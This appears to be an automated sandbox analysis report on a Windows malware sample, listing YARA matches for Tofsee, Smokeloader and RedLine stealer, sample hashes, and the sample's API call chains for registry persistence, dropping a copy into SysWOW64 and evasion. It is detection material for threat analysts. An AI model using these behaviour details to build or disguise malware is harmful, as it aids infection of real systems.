        Source: 17.3.qbxctmyn.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 17.3.qbxctmyn.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.3.file.exe.21c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.3.file.exe.21c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.2.file.exe.2080e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.2.file.exe.2080e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000011.00000002.310684388.00000000005B1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C9130_2_0040C913
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_0040C91317_2_0040C913
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0012C91323_2_0012C913
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,0_2_00401280
        Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.e30e67.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.e30e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.3.qbxctmyn.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.3.qbxctmyn.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.3.file.exe.21c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.3.file.exe.21c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.file.exe.2080e67.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.file.exe.2080e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000011.00000002.310684388.00000000005B1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\htdzdeug\Jump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040EE2A appears 40 times
        Source: C:\Users\user\Desktop\file.exeCode function: String function: 00402544 appears 53 times
        Source: C:\Users\user\Desktop\file.exeCode function: String function: 020827AB appears 35 times
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,0_2_00408E26
        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_17-14639
        Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@34/16@5/2
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,17_2_00409A6B
